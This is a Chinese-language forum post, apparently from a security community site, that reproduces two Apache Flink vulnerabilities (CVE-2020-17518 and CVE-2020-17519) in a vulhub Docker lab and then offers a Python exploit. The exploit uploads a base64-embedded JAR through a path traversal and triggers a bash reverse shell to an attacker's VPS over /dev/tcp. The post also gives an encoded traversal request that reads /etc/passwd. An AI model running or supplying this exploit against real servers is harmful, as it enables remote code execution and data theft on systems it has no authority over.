复现apache Flink(CVE-2020-17518/17519)附getShell EXP

kanjin   ·   发表于 2021-01-15 19:20:18   ·   漏洞文章

安装环境

CVE-2020-17518

1.拉取vulhub环境(github搜vulhub自己下)
2.进入目录

  1. cd vulhub/flink/CVE-2020-17518

3.启动环境

  1. docker-compose up -d

通过浏览器访问http:your-ip:8081界面如下
在这里插入图片描述
4.点击Add new按钮抓包
在这里插入图片描述5.进入docker环境,查看是否创建成功

  1. docker ps
  2. docker exec -it "docker ID" /bin/bash
  3. cd /tmp

在这里插入图片描述

6.复现成功

CVE-2020-17519

  1. /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%
  2. 252f..%252f..%252f..%252f..%252fetc%252fpasswd

发包
在这里插入图片描述也可直接在页面操作
点击 进入http://your-ip:8081//jobmanager/logs是一个json界面

在这里插入图片描述在后面加入

  1. ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

在这里插入图片描述
获取之前上传的success123文件
在这里插入图片描述

关闭docker环境

  1. docker-compose down -v

getshellexp

基于python3,代码写的比较粗糙,大佬绕道。

  1. import requests
  2. import base64
  3. import argparse
  4. def main():
  5. post = 8888
  6. my_parser=argparse.ArgumentParser()
  7. my_parser.add_argument('--url',action = 'store',help="普通用法:python3 FlinkGetshell.py --url http://xxxx:8081")
  8. my_parser.add_argument('--server',action = 'store',help="getshell用法:先在自己vps监听"+str(post)+"端口然后 python3 FlinkGetshell.py --url http://xxxxx:8081 --server 自己vps")
  9. parse=my_parser.parse_args()
  10. ## 懒的自己打包,直接用的别人base64编码过得jar
  11. jarBase64="UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA"
  12. baseUrl=parse.url
  13. # if sys.argv[1]!="--url":
  14. # print("poc用法:python3 FlinkGetshell.py --url http://xxxxx:8081")
  15. # print("getshell用法:先在自己vps监听"+str(post)+"端口 ")
  16. # print("然后 python3 FlinkGetshell.py --url http://xxxxx:8081 --server 自己vps")
  17. # exit()
  18. # 获取web.tmpdir的路径
  19. runDir=requests.get(baseUrl+"/jobmanager/config").json()
  20. for i in runDir:
  21. if i["key"]=="web.tmpdir":
  22. tmpdir=i["value"]
  23. #上传jar包
  24. jar=base64.b64decode(jarBase64)
  25. with open("fuck.jar","wb") as f:
  26. f.write(jar)
  27. files={
  28. "jarfile":('../../../../../..%s/flink-web-upload/fuck.jar' % tmpdir, open("fuck.jar",'rb'))
  29. }
  30. upload=requests.post(baseUrl+"/jars/upload",files=files,timeout=30,verify=False)
  31. print('the shell:%s/jars/fuck.jar/run?entry-class=Execute&program-args="command"' % baseUrl)
  32. ## getshell
  33. if(parse.server!=None):
  34. print("请先在服务器上监听"+str(post)+"端口")
  35. getshell=requests.post(baseUrl+"/jars/new2.jar/run?entry-class=Execute&program-args='/bin/bash+-i+>%26+/dev/tcp/{}/{}+0>%261'".format(parse.server,post))
  36. print("如果没有getshell成功,请在执行一遍")
  37. if __name__=="__main__":
  38. main()

最后

思路来自
网址在这

用户名金币积分时间理由
veek 50.00 0 2021-01-18 10:10:39 初投稿奖励~

打赏我,让我更有动力~

1 条回复   |  直到 2021-1-18 | 1810 次浏览

gc144188
发表于 2021-1-18

老哥牛批

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.